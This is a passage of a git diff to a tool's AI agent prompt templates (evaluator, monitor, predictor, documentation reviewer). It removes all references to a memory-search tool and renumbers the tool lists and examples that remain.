response. Using standard password hashing and validation patterns. **Code Changes**: @@ -933,7 +814,6 @@ def register(): 6. test_register_sql_injection_safe 7. test_register_token_decodes_correctly -**Used Patterns**: `["sec-0012", "impl-0034"]` --- @@ -941,7 +821,7 @@ def register(): **Subtask**: "Add rate limiting to existing API endpoint" -**Approach**: Token bucket rate limiting using existing Redis connection. 100 req/min per IP. mcp__mem0__map_tiered_search found impl-0089 (Redis patterns). +**Approach**: Token bucket rate limiting using existing Redis connection. 100 req/min per IP. Using standard Redis rate limiting patterns. **Code Changes**: @@ -1022,7 +902,6 @@ def get_data(): 4. test_rate_limit_per_ip_isolation 5. test_rate_limit_headers_present -**Used Patterns**: `["impl-0089"]` --- @@ -1058,7 +937,7 @@ recommendation: "Option 1 - clean solution worth scope expansion" **Subtask**: "Implement WebSocket reconnection logic" -**Approach**: Exponential backoff reconnection. mcp__mem0__map_tiered_search empty. context7 timed out. Implemented standard pattern with documented fallback. +**Approach**: Exponential backoff reconnection. context7 timed out. Implemented standard pattern with documented fallback. **Code Changes**: ```typescript @@ -1107,6 +986,4 @@ export class ReconnectingWebSocket { 3. test_reconnect_max_attempts_triggers_callback 4. test_reconnect_handles_immediate_disconnect -**Used Bullets**: `[]` (No similar patterns in mem0. Novel implementation.) - diff --git a/src/mapify_cli/templates/agents/documentation-reviewer.md b/src/mapify_cli/templates/agents/documentation-reviewer.md index 932dc07..90417c3 100644 --- a/src/mapify_cli/templates/agents/documentation-reviewer.md +++ b/src/mapify_cli/templates/agents/documentation-reviewer.md @@ -119,11 +119,6 @@ ELSE: → Use Fetch + manual README.md analysis → Log: "deepwiki unavailable, architecture analysis limited" -IF mcp__mem0__* available: - → Use for historical pattern matching -ELSE: - → Skip pattern matching, rely on explicit checks only - → Log: "mem0 unavailable, no historical context" ``` ## Fallback Protocol @@ -441,12 +436,6 @@ mcp__deepwiki__ask_question( question="How does Gatekeeper handle CRD installation?" ) -# 4. Check historical patterns (if mem0 available) -mcp__mem0__map_tiered_search( - query="CRD installation documentation patterns", - limit=5, - similarity_threshold=0.7 -) ``` --- @@ -709,14 +698,6 @@ mcp__mem0__map_tiered_search( **Documentation to Review**: {{subtask_description}} -{{#if existing_patterns}} -## Relevant mem0 Knowledge - -{{existing_patterns}} - -**Use these patterns** to identify common documentation issues and prioritize checks. -{{/if}} - {{#if feedback}} ## Previous Review Feedback diff --git a/src/mapify_cli/templates/agents/evaluator.md b/src/mapify_cli/templates/agents/evaluator.md index 96a098b..5bc965a 100644 --- a/src/mapify_cli/templates/agents/evaluator.md +++ b/src/mapify_cli/templates/agents/evaluator.md @@ -257,13 +257,6 @@ Scoring Context Decision: ALWAYS: → sequentialthinking (systematic quality analysis: break down dimensions, evaluate trade-offs, ensure consistency) -IF complex architectural decisions: - → mcp__mem0__map_tiered_search: "quality metrics [feature]", "performance benchmark [op]", "best practice score [tech]" - -IF learning from past evaluation reasoning: - → mcp__mem0__map_tiered_search: "quality assessment for [feature]", "scoring rationale [pattern]" - → Understand WHY past implementations scored high/low, apply reasoning - IF previous implementations exist: → get_review_history (compare solutions, learn from past issues, maintain scoring consistency) @@ -436,17 +429,12 @@ Thought 7: Generate recommendation with research feedback **Use When**: Check consistency with past implementations **Rationale**: Maintain consistent standards (e.g., if past testability scored 8/10, use same criteria). Prevents score inflation/deflation. -### 3. mcp__mem0__map_tiered_search -**Use When**: Need quality benchmarks/best practices from memory -**Queries**: `"quality metrics [feature]"`, `"performance benchmark [op]"`, `"best practice score [tech]"`, `"test coverage standard [component]"` -**Rationale**: Quality is relative—DB query performance ≠ API performance. Mem0 provides domain-specific baselines from stored patterns. - -### 4. mcp__context7__get-library-docs +### 3. mcp__context7__get-library-docs **Use When**: Solution uses external libraries/frameworks **Process**: `resolve-library-id` → `get-library-docs(topics: best-practices, performance, security, testing)` **Rationale**: Libraries define quality standards (React testing, Django security). Validate solutions follow these. -### 5. mcp__deepwiki__ask_question +### 4. mcp__deepwiki__ask_question **Use When**: Need industry standard comparisons **Queries**: "What metrics does [repo] use for [feature]?", "How do top projects test [feature]?", "Performance benchmarks for [op]?" **Rationale**: Learn from production code. If top projects achieve 90% auth coverage, that's a valid benchmark. @@ -454,7 +442,6 @@ Thought 7: Generate recommendation with research feedback **IMPORTANT**: - ALWAYS use sequential thinking for complex analysis -- Search mem0 for domain-specific benchmarks - Get review history to maintain consistency - Validate against library best practices - Document which MCP tools informed scores @@ -817,7 +804,6 @@ SCORING CONSISTENCY VALIDATION: → Checked existing_patterns for similar implementations → Compared against scoring rubric thresholds (8-9 = meets all, 6-7 = meets core) → Considered project conventions ({{language}}, {{framework}} best practices) - → Used mcp__mem0__map_tiered_search to find similar past evaluations for calibration → NOT scoring in isolation without context [ ] **4. Consistency with Criteria** - Do my scores map to the published scoring rubric? @@ -852,7 +838,6 @@ SCORING CONSISTENCY VALIDATION: [ ] **8. Comparative Context** - Did I explain if this score is typical/atypical for the subtask type? → Noted if score is above/below average for similar subtasks → Explained why unusually high/low scores occurred - → Referenced past implementations if available (mem0 search) → Provided context: "8/10 is typical for CRUD features" vs "8/10 is exceptional for complex algorithm" → NOT scoring without explaining relative performance @@ -874,9 +859,9 @@ SCORING CONSISTENCY VALIDATION: **Why This Checklist Matters**: -Evaluator is the **final quality gate** before Reflector/Curator learning begins. Inconsistent scoring pollutes downstream processes: +Evaluator is the **final quality gate** before downstream processes. Inconsistent scoring pollutes workflow: -1. **Inconsistent scores** → Curator can't trust helpful_count thresholds → memory quality degrades +1. **Inconsistent scores** → Downstream agents cannot trust evaluation signals 2. **False positives** → Actor wastes iteration cycles on non-issues → workflow stalls 3. **Missing dimensions** → Critical gaps (security, performance) overlooked → production failures 4. **Vague justifications** → Actor doesn't understand what to improve → repeats mistakes @@ -885,7 +870,6 @@ Each checklist item prevents a specific failure mode. Systematic validation ensu - **Scoring consistency** across subtasks (same code quality → same score) - **Evidence-based decisions** (not gut feelings) - **Clear feedback** for Actor (actionable improvements) -- **Trustworthy signals** for Curator (reliable helpful_count) @@ -939,7 +923,7 @@ Output MUST be valid JSON. Orchestrator parses this programmatically. Invalid JS "next_steps": [ "Concrete action to improve (if recommendation != 'proceed')" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1208,7 +1192,7 @@ def calculate_user_discount( "completeness": "9/10 - Very complete: code, tests, comprehensive docs, error handling, logging. Missing 1 point: no deployment notes or performance benchmarks." }, "next_steps": [], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1261,7 +1245,7 @@ def calculate_user_discount( "Add type hints and docstring", "Add structured logging for debugging" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search", "get-library-docs"] + "mcp_tools_used": ["sequentialthinking", "get-library-docs"] } ``` @@ -1317,7 +1301,7 @@ def calculate_user_discount( "Add structured logging for debugging and monitoring", "Add docstrings and type hints throughout" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1374,7 +1358,7 @@ def calculate_user_discount( "Add comprehensive authorization tests", "Document security considerations in API docs" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1439,7 +1423,7 @@ def calculate_user_discount( "Add extensive tests including: successful payment, declined card, timeout, network failure, duplicate prevention", "Consider using payment SDK instead of raw API calls for built-in security" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search", "get-library-docs", "deepwiki"] + "mcp_tools_used": ["sequentialthinking", "get-library-docs", "deepwiki"] } ``` @@ -1453,8 +1437,7 @@ def calculate_user_discount( **Before returning your evaluation JSON:** 1. ✅ Did I use sequential thinking for quality analysis? -2. ✅ Did I search mem0 for quality benchmarks relevant to this feature? -3. ✅ Did I check review history for consistency with past scores? +2. ✅ Did I check review history for consistency with past scores? 4. ✅ Are all scores (0-10) justified with specific evidence? 5. ✅ Is overall_score calculated correctly using weighted formula? 6. ✅ Is recommendation based on decision tree logic? diff --git a/src/mapify_cli/templates/agents/monitor.md b/src/mapify_cli/templates/agents/monitor.md index 807ef53..a4ed12f 100644 --- a/src/mapify_cli/templates/agents/monitor.md +++ b/src/mapify_cli/templates/agents/monitor.md @@ -276,8 +276,6 @@ IF code uses external libraries: → Run resolve-library-id + get-library-docs IF complex logic detected (≥3 nested conditionals, state machines, async): → Run sequentialthinking with structured thoughts -IF similar code reviewed before: - → Run mcp__mem0__map_tiered_search with pattern query IF detected_language != "unknown": → Consider language-specific static analysis tools @@ -445,13 +443,13 @@ IF Actor disputes a finding: ### Pattern Conflict Resolution ```text -IF mem0 pattern conflicts with dimension requirement: +IF learned pattern conflicts with dimension requirement: → Security/Correctness dimensions WIN (non-negotiable) - → Code-quality/Style dimensions: mem0 pattern wins + → Code-quality/Style dimensions: learned pattern wins → Document conflict in feedback_for_actor Example: - mem0 pattern: "Allow single-letter vars in list comprehensions" + Learned pattern: "Allow single-letter vars in list comprehensions" Dimension 3: "Clear naming required" → Allow 'x' in: [x*2 for x in items] → Block 'x' in: def calculate(x, y, z) @@ -467,7 +465,7 @@ Example: **CRITICAL**: Comprehensive code review requires multiple perspectives. Use ALL relevant MCP tools to catch issues that single-pass review might miss. -Code review quality directly impacts production stability. MCP tools provide: (1) professional AI review baseline, (2) historical pattern matching for known issues, (3) library-specific best practices, (4) industry standard comparisons. Using these tools catches 3-5x more issues than manual review alone. +Code review quality directly impacts production stability. MCP tools provide: (1) professional AI review baseline, (2) library-specific best practices, (3) industry standard comparisons. Using these tools catches 3-5x more issues than manual review alone. ### Tool Selection Decision Framework @@ -476,16 +474,16 @@ Code review quality directly impacts production stability. MCP tools provide: (1 Review Scope Decision: Implementation Code: - → request_review (AI baseline) → mcp__mem0__map_tiered_search (known patterns) + → request_review (AI baseline) → get-library-docs (external libs) → sequentialthinking (complex logic) → deepwiki (security patterns) Documentation: → Glob/Read (find source of truth) → Fetch (validate URLs) - → mcp__mem0__map_tiered_search (anti-patterns) → ESCALATE if inconsistent + → ESCALATE if inconsistent Test Code: - → mcp__mem0__map_tiered_search (test patterns) → get-library-docs (framework practices) + → get-library-docs (framework practices) → Verify coverage expectations ``` @@ -503,25 +501,7 @@ request_review({ }) ``` -### 2. mcp__mem0__map_tiered_search -**Use When**: Check known issues/anti-patterns from memory -**Parameters**: `query` (search string), `category` (optional filter) -**Queries**: `"code review issue [pattern]"`, `"security vulnerability [code]"`, `"anti-pattern [tech]"`, `"test anti-pattern [type]"` -**Rationale**: Past issues repeat—prevent regressions by searching learned patterns - -**Re-rank results** by relevance to current review: -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.category matches review_dimension: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.severity in {critical, high}: relevance_score += 1 - IF pattern.validated == true: relevance_score += 1 -SORT by relevance_score DESC -USE top 3 patterns for issue detection -``` - -### 3. mcp__sequential-thinking__sequentialthinking +### 2. mcp__sequential-thinking__sequentialthinking **Use When**: Complex logic requiring systematic trace (see triggers below) **Complexity Triggers** (use sequentialthinking if ANY apply): @@ -542,18 +522,18 @@ Thought N+1: Check for unreachable code or logic gaps Conclusion: List issues found with line numbers ``` -### 4. mcp__context7__get-library-docs +### 3. mcp__context7__get-library-docs **Use When**: Code uses external libraries/frameworks **Process**: `resolve-library-id` → `get-library-docs(library_id, topic)` **Topics**: best-practices, security, error-handling, performance, deprecated-apis **Rationale**: Current docs prevent deprecated APIs and missing security features -### 5. mcp__deepwiki__ask_question +### 4. mcp__deepwiki__ask_question **Use When**: Validate security/architecture patterns **Queries**: "How does [repo] handle [concern]?", "Common mistakes in [feature]?" **Rationale**: Learn from battle-tested production code -### 6. Fetch Tool (Documentation Review Only) +### 5. Fetch Tool (Documentation Review Only) **Use When**: Reviewing documentation that mentions external projects/URLs **Process**: Extract URLs → Fetch each → Verify dependencies documented **Rationale**: External integrations have hidden dependencies (CRDs, adapters) @@ -561,7 +541,6 @@ Conclusion: List issues found with line numbers **IMPORTANT**: - Use request_review FIRST for all code reviews -- Always search mem0 for known patterns before marking valid - Get current library docs for ANY external library used - Use sequential thinking for complex logic validation - Document which MCP tools you used in your review summary @@ -574,7 +553,6 @@ Conclusion: List issues found with line numbers Tool | Timeout | Action on Timeout ------------------------|---------|---------------------------------- request_review | 5 min | Proceed to manual 10-dimension review -map_tiered_search | 2 min | Skip, note in summary, proceed sequentialthinking | 5 min | Manual trace critical paths get-library-docs | 3 min | Use deepwiki or Fetch as fallback deepwiki | 3 min | Skip pattern validation, proceed @@ -596,11 +574,6 @@ IF request_review fails or times out (>5 min): → Note "MCP baseline unavailable" in summary → Apply extra scrutiny to security dimension -IF map_tiered_search returns empty results: - → This is NORMAL for new codebases or novel patterns - → Do NOT treat as blocking - → Proceed with standard review - IF get-library-docs unavailable or library not indexed: → Use deepwiki to search for library patterns → Use Fetch for official documentation URLs @@ -628,7 +601,6 @@ Priority 1: Manual Review (human-level logic) → Trust tools for SYNTAX errors, type mismatches, style violations Priority 2: Security-focused tools - → map_tiered_search (known vulnerabilities) > request_review (general) → deepwiki (production patterns) > get-library-docs (generic docs) Priority 3: Specificity @@ -656,7 +628,6 @@ Priority 4: Severity | Short Name | Full MCP Name | Category | |------------|---------------|----------| | `request_review` | `mcp__claude-reviewer__request_review` | AI Review | -| `map_tiered_search` | `mcp__mem0__map_tiered_search` | Knowledge | | `sequentialthinking` | `mcp__sequential-thinking__sequentialthinking` | Analysis | | `get_library_docs` | `mcp__context7__get-library-docs` | Docs | | `resolve_library_id` | `mcp__context7__resolve-library-id` | Docs | @@ -692,28 +663,6 @@ Priority 4: Severity **Key Fields**: `findings[].line`, `findings[].severity`, `findings[].message` **Integration**: Convert each finding to Monitor issue format, map type→category -#### map_tiered_search Response -```json -{ - "results": [ - { - "id": "mem-uuid", - "memory": "Pattern: Always validate JWT expiry before processing", - "score": 0.95, - "metadata": { - "category": "security", - "source": "auth-service", - "created_at": "2024-01-15T10:30:00Z" - } - } - ], - "total": 3, - "query": "JWT validation patterns" -} -``` -**Key Fields**: `results[].memory`, `results[].score` (>0.8 = highly relevant) -**Integration**: Empty results is NORMAL for new codebases - proceed without error - #### sequentialthinking Response ```json { @@ -965,8 +914,7 @@ def divide(a, b): 2. Verify parameterized queries (no string interpolation) 3. Check command execution (no shell=True with user input) 4. Validate file paths (no path traversal) -5. Search mem0 for known vulnerabilities: `"security vulnerability [language]"` -6. Use deepwiki to check production security patterns +5. Use deepwiki to check production security patterns #### Pass Criteria - All inputs validated with allowlist approach @@ -1401,7 +1349,7 @@ ELSE: ``` **Research Triggers**: React, Next.js, Django, FastAPI, rate limiting, webhook handling, distributed systems -**Valid Skips**: Pattern in mem0, language primitives only, deep expertise, first principles +**Valid Skips**: Language primitives only, deep expertise, first principles **DO NOT block** for missing research if: @@ -1551,7 +1499,7 @@ Before returning JSON, verify: "failed_checks": [], "feedback_for_actor": "Implementation is solid. No changes required.", "estimated_fix_time": "5 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -1666,7 +1614,7 @@ Do NOT invent issues to justify review effort. Empty `issues` array is valid. "type": "array", "items": { "type": "string", - "enum": ["request_review", "map_tiered_search", "map_add_pattern", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] + "enum": ["request_review", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] }, "description": "MCP tools successfully used during review" }, @@ -1674,7 +1622,7 @@ Do NOT invent issues to justify review effort. Empty `issues` array is valid. "type": "array", "items": { "type": "string", - "enum": ["request_review", "map_tiered_search", "map_add_pattern", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] + "enum": ["request_review", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] }, "description": "MCP tools that failed or timed out" }, @@ -1821,7 +1769,7 @@ IF map-planning workflow active AND valid === true: "failed_checks": ["testability", "documentation"], "feedback_for_actor": "Actionable guidance with specific steps (reference dimensions: 'Security dimension failed: add input validation' or 'Dimension 2 (Security): missing rate limiting')", "estimated_fix_time": "5 minutes|30 minutes|2 hours|4 hours", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -2146,9 +2094,6 @@ IF ≥3 MCP tools fail in sequence: |------|--------------|-----------------| | `request_review` | Timeout (>5min) | Skip AI baseline, proceed with full 10-dimension manual review | | `request_review` | Error response | Log error, proceed with manual review, note limitation | -| `map_tiered_search` | Empty results | Normal for new code - proceed, no fallback needed | -| `map_tiered_search` | Timeout | Skip pattern matching, proceed with standard review | -| `map_tiered_search` | Error | Skip impact analysis, note in feedback | | `sequentialthinking` | Quota exceeded | Manual trace critical paths, recommend human review | | `get_library_docs` | Library not indexed | Try deepwiki → Fetch docs URL → note limitation | | `deepwiki` | Timeout | Skip pattern validation, proceed with conservative review | @@ -2177,7 +2122,7 @@ IF Manual Only mode: "summary": "Manual review completed - MCP tools unavailable", "issues": [...], "mcp_tools_used": [], - "mcp_tools_failed": ["request_review", "map_tiered_search", "sequentialthinking"], + "mcp_tools_failed": ["request_review", "sequentialthinking"], "recovery_mode": "manual_only", "recovery_notes": "3+ tool failures triggered manual-only review. Extra scrutiny applied to Security and Correctness dimensions.", "feedback_for_actor": "Note: This review was performed without AI baseline (tool failures). Consider requesting a follow-up review when tools are available for security-critical sections." @@ -2193,9 +2138,9 @@ IF tool returns partial results (truncated, incomplete): → Do NOT treat as full failure → Supplement with manual review for gaps -Example: map_tiered_search returns 3 of expected 10 results - → Use the 3 results - → Note: "Pattern search returned partial results" +Example: A tool returns partial results (3 of expected 10) + → Use the available results + → Note: "Tool returned partial results" → Manually check for common patterns not in results ``` @@ -2247,7 +2192,7 @@ After each review, the orchestrator should log: "duration_seconds": 180, "loc_reviewed": 450, "language": "python", - "tools_used": ["request_review", "map_tiered_search"], + "tools_used": ["request_review"], "tools_failed": [], "issues_found": {"critical": 0, "high": 2, "medium": 5, "low": 1}, "valid": true, @@ -2266,7 +2211,7 @@ IF false positive rate >15%: IF bug catch rate <70%: → Expand dimension checklists → Add more MCP tool triggers - → Review missed patterns, add to mem0 + → Review missed patterns, document for future reference IF review time consistently >target: → Optimize tool selection @@ -2349,7 +2294,7 @@ IF review time consistently >target: "failed_checks": ["correctness", "security", "testability"], "feedback_for_actor": "Add validation, email check, db error handling, tests. Start with missing field validation (HIGH), then add security checks.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -2394,7 +2339,7 @@ def search_users(query): "failed_checks": ["security", "correctness"], "feedback_for_actor": "CRITICAL: SQL injection vulnerability allows arbitrary database access. MUST fix before deployment. Use parameterized queries (see suggestion). Also add input validation for query length.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search", "deepwiki"] + "mcp_tools_used": ["request_review", "deepwiki"] } ``` @@ -2431,7 +2376,7 @@ def search_users(query): "failed_checks": ["documentation"], "feedback_for_actor": "Read tech-design.md:145-160 for correct trigger syntax. Use 'engines: {}' not 'presets: []'. Add both disable scenarios (global and per-engine).", "estimated_fix_time": "2 hours", - "mcp_tools_used": ["Glob", "Read", "map_tiered_search"] + "mcp_tools_used": ["Glob", "Read"] } ``` @@ -2439,7 +2384,7 @@ def search_users(query): ### Example 4: Edge Case - MCP Tools Unavailable -**Scenario**: request_review times out, map_tiered_search returns empty +**Scenario**: request_review times out, other tools unavailable **Code**: ```python @@ -2486,7 +2431,7 @@ def check_rate_limit(user_id, action, limit=100, window=3600): "failed_checks": ["correctness", "performance", "testability"], "feedback_for_actor": "Note: MCP baseline review unavailable (timeout). Manual review identified race condition in rate limiter - use Redis pipeline or Lua script for atomic incr+expire. Add Redis connection error handling. Consider dependency injection for testability.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review (timeout)", "map_tiered_search (no results)"] + "mcp_tools_used": ["request_review (timeout)"] } ``` @@ -2500,7 +2445,7 @@ def check_rate_limit(user_id, action, limit=100, window=3600): **Before returning your review JSON:** 1. ✅ Did I use request_review for code implementations? -2. ✅ Did I search mem0 for known issue patterns? +2. ✅ Did I check for known issue patterns? 3. ✅ Did I check all 10 validation dimensions systematically? 4. ✅ Did I verify documentation against source of truth (if applicable)? 5. ✅ Are all issues specific with location and actionable suggestions? diff --git a/src/mapify_cli/templates/agents/predictor.md b/src/mapify_cli/templates/agents/predictor.md index 5261e76..920718d 100644 --- a/src/mapify_cli/templates/agents/predictor.md +++ b/src/mapify_cli/templates/agents/predictor.md @@ -47,14 +47,7 @@ IF analyzer_output provided → Cross-reference affected files ### Core Analysis Tools -**1. mem0 (Tiered Memory Search)** -- **Purpose**: Find historical patterns and past analyses using tiered memory search -- **Capabilities**: - - `mcp__mem0__map_tiered_search`: Search for patterns with tiered retrieval (L1 recent → L2 frequent → L3 semantic) -- **Best for**: Finding similar past changes, historical impact analyses, migration patterns -- **Fallback if unavailable**: grep - -**2. grep (Fast Text Search)** +**1. grep (Fast Text Search)** - **Purpose**: Pattern matching across repository files - **Always available**: Yes (baseline tool) - **Capabilities**: @@ -75,14 +68,12 @@ TIER 1 (Minimal - 30 sec): - Symbol usage: grep -r "{function_name}" --include="*.py" TIER 2 (Standard - 1-2 min): - ├── 1. mcp__mem0__map_tiered_search (historical patterns) - └── 2. grep (dependency analysis + verification) + └── grep (dependency analysis + verification) - Sequential execution - Cross-validate results TIER 3 (Deep - 3-5 min): - ├── 1. mcp__mem0__map_tiered_search (comprehensive) ─┐ - └── 2. grep (extended) ─────────────────────────────┘ Parallel execution + └── grep (extended) + deepwiki/context7 as needed - Cross-validate all results - Flag disagreements ``` @@ -91,8 +82,7 @@ TIER 3 (Deep - 3-5 min): ``` MATCH (Category B: +0.15): - All tools identify same core affected files (±2 file variance) - Example: mem0=12 files, grep=13 files → MATCH + Multiple tools identify same core affected files (±2 file variance) SINGLE TOOL (Category B: +0.05): Only one tool ran successfully, results appear complete @@ -100,7 +90,6 @@ SINGLE TOOL (Category B: +0.05): CONFLICT (Category B: -0.10): >30% disagreement on affected components - Example: mem0=5 files, grep=15 files → CONFLICT Action: Trust grep (most literal), cap confidence at 0.60 ``` @@ -229,7 +218,7 @@ Before any analysis, classify the change to select appropriate depth: 2. Classify risk (usually "low") 3. Output JSON with confidence 0.9+ -**Skip**: mem0 tiered search, deepwiki +**Skip**: deepwiki, context7 ### Tier 2: STANDARD Analysis (1-2 minutes) **When to use**: @@ -240,12 +229,11 @@ Before any analysis, classify the change to select appropriate depth: - Configuration file changes **Process**: -1. mcp__mem0__map_tiered_search for patterns -2. grep for dependency analysis -3. Manual verification of edge cases -4. Risk classification +1. grep for dependency analysis +2. Manual verification of edge cases +3. Risk classification -**Use**: mcp__mem0__map_tiered_search + grep +**Use**: grep + manual verification ### Tier 3: DEEP Analysis (3-5 minutes) **When to use**: @@ -391,16 +379,6 @@ Example 3: Changed core/utils.py, import count = 25 **Current Subtask**: {{subtask_description}} -{{#if existing_patterns}} -## Relevant Historical Patterns - -The following patterns have been retrieved from memory (tiered search results): - -{{existing_patterns}} - -**Instructions**: Use these patterns to identify common dependency patterns and predict typical impact areas. -{{/if}} - {{#if feedback}} ## Previous Impact Analysis Feedback @@ -419,8 +397,7 @@ Previous analysis identified these concerns: **CRITICAL**: Accurate impact prediction requires historical data, dependency analysis, and architectural knowledge. MCP tools provide this context. -Impact analysis is about pattern recognition. Similar changes have happened before—renaming APIs, refactoring modules, changing schemas. MCP tools let us learn from history: -- mcp__mem0__map_tiered_search finds past breaking changes and migration patterns +Impact analysis is about pattern recognition. Similar changes have happened before--renaming APIs, refactoring modules, changing schemas. MCP tools let us learn from history: - deepwiki shows how mature projects handle similar changes - context7 validates library version compatibility @@ -432,60 +409,25 @@ Without these tools, we're guessing. With them, we're predicting based on eviden ``` BEFORE analyzing impact, gather context: -ALWAYS: - 1. FIRST → mcp__mem0__map_tiered_search (historical patterns) - - Query: "breaking change [change_type]" - - Query: "dependency impact [component_name]" - - Query: "migration strategy [similar_change]" - - Learn from past impact analyses - - Uses tiered retrieval: L1 recent → L2 frequent → L3 semantic - IF external library involved: - 2. THEN → get-library-docs (compatibility check) + 1. THEN → get-library-docs (compatibility check) - Query: Changes between versions (migration guides) - Identify deprecated APIs - Understand breaking changes in library updates IF architectural change: - 3. THEN → deepwiki (architectural precedents) + 2. THEN → deepwiki (architectural precedents) - Ask: "How do projects migrate from [old_pattern] to [new_pattern]?" - Learn typical ripple effects - Identify commonly missed dependencies -THEN → Grep/Glob (manual verification) - 4. Search for symbol names, import statements, file references +ALWAYS → Grep/Glob (manual verification) + 3. Search for symbol names, import statements, file references - Automated search might miss dynamic imports, reflection, config files - Manual search catches edge cases ``` -### 1. mcp__mem0__map_tiered_search -**Use When**: ALWAYS - before starting analysis -**Purpose**: Learn from past impact analyses and migration patterns - -**Rationale**: Most changes aren't novel. Someone has renamed a similar API, refactored a similar module, or changed a similar schema before. mem0 contains the outcomes—what broke, what migrations were needed, what was missed. - -**Tiered Retrieval Strategy**: -- **L1 (Recent)**: Last 7 days of similar changes -- **L2 (Frequent)**: Commonly accessed patterns (helpful_count >= 3) -- **L3 (Semantic)**: Deep semantic search for similar contexts - - -Before analyzing API rename impact: -- Search: "breaking change API rename" → find past API renames -- Search: "migration strategy function signature" → learn migration patterns -- Search: "dependency impact [module_name]" → understand this module's usage patterns -Use results to guide dependency tracing and risk assessment. - - - -Starting analysis with Grep immediately: -- Miss architectural context -- No historical precedent for risk assessment -- Repeat mistakes from past analyses -- Under-predict breaking changes - - -### 2. mcp__context7__get-library-docs +### 1. mcp__context7__get-library-docs **Use When**: Change involves external library or framework **Process**: 1. `resolve-library-id` with library name @@ -502,7 +444,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: **ALWAYS** check library docs for version changes. -### 3. mcp__deepwiki__read_wiki_structure + ask_question +### 2. mcp__deepwiki__read_wiki_structure + ask_question **Use When**: Architectural changes or unfamiliar patterns **Purpose**: Learn from mature projects' migration strategies @@ -513,7 +455,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: **Rationale**: Architectural changes have hidden complexity. How do you migrate thousands of database records? How do you version APIs without breaking clients? Mature projects have solved these problems—learn from them. -### 4. Standard Tools (Read, Grep, Glob, Bash) +### 3. Standard Tools (Read, Grep, Glob, Bash) **Use When**: Always—for verification and edge cases **Purpose**: Catch what automated tools miss @@ -533,7 +475,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: - String-based imports or reflection -### 6. mcp__sequential-thinking__sequentialthinking +### 4. mcp__sequential-thinking__sequentialthinking **Use When**: Complex dependency tracing requiring multi-step reasoning **Purpose**: Structure transitive dependency analysis and impact cascade tracing @@ -657,13 +599,8 @@ Thought 8: Assess deployment coordination needs and rollout timeline - Added/removed dependencies - Modified interfaces or contracts -### Phase 2: Historical Context -3. **Search mem0 for patterns** (mcp__mem0__map_tiered_search) - - Has this type of change happened before? - - What were the impacts? - - What did previous analyses miss? - -4. **Check library compatibility** (if external dependencies involved) +### Phase 2: Context Gathering +3. **Check library compatibility** (if external dependencies involved) - Breaking changes in library versions - Deprecation warnings - Migration requirements @@ -1063,13 +1000,7 @@ def get_weather(city: str, region: str) -> dict: ### Analysis Process -**Step 1: Historical context** (mcp__mem0__map_tiered_search) -- Query: "breaking change function signature" -- Result: Past signature changes required 3-5 updates per call site -- Query: "migration strategy required parameter" -- Result: Common pattern: add with default first, then make required - -**Step 2: Dependency analysis** (Grep) +**Step 1: Dependency analysis** (Grep) - Query: `grep -r "get_weather" --include="*.py"` - Result: ``` @@ -1080,7 +1011,7 @@ def get_weather(city: str, region: str) -> dict: scripts/daily_report.py:56: get_weather(config.default_city) ``` -**Step 3: Manual verification** (Grep) +**Step 2: Manual verification** (Grep) - Grep for `"get_weather"` in configs, docs: ```bash config/api_endpoints.yaml:12: - name: get_weather @@ -1088,16 +1019,16 @@ def get_weather(city: str, region: str) -> dict: README.md:78: weather = get_weather("Boston") ``` -**Step 4: Breaking change classification** +**Step 3: Breaking change classification** - Function signature change: **BREAKING** (added required parameter) - 5 direct call sites + 3 documentation references - Risk: HIGH (5-10 usage sites, breaking change) -**Step 5: Confidence assessment** -- Automated analysis: ✓ (all call sites found) -- Manual verification: ✓ (found doc references) -- Test coverage: ✓ (2 tests exist) -- Confidence: 0.85 (high—complete picture) +**Step 4: Confidence assessment** +- Automated analysis: completed (all call sites found) +- Manual verification: completed (found doc references) +- Test coverage: verified (2 tests exist) +- Confidence: 0.85 (high -- complete picture) ### Output (JSON) @@ -1106,7 +1037,7 @@ def get_weather(city: str, region: str) -> dict: "analysis_metadata": { "tier_selected": "2", "tier_rationale": "Internal function change with 5-10 affected files; standard analysis appropriate", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 75 }, "predicted_state": { @@ -1182,8 +1113,8 @@ def get_weather(city: str, region: str) -> dict: "score": 0.85, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 has similar patterns", "adjustment": 0.20}, - {"category": "B", "factor": "mem0 + grep match", "adjustment": 0.15}, + {"category": "A", "factor": "grep found comprehensive usage data", "adjustment": 0.20}, + {"category": "B", "factor": "grep results clear and complete", "adjustment": 0.15}, {"category": "C", "factor": "Static code (no flags)", "adjustment": 0.00}, {"category": "D", "factor": "Tests exist for affected files", "adjustment": 0.00} ], @@ -1322,12 +1253,7 @@ 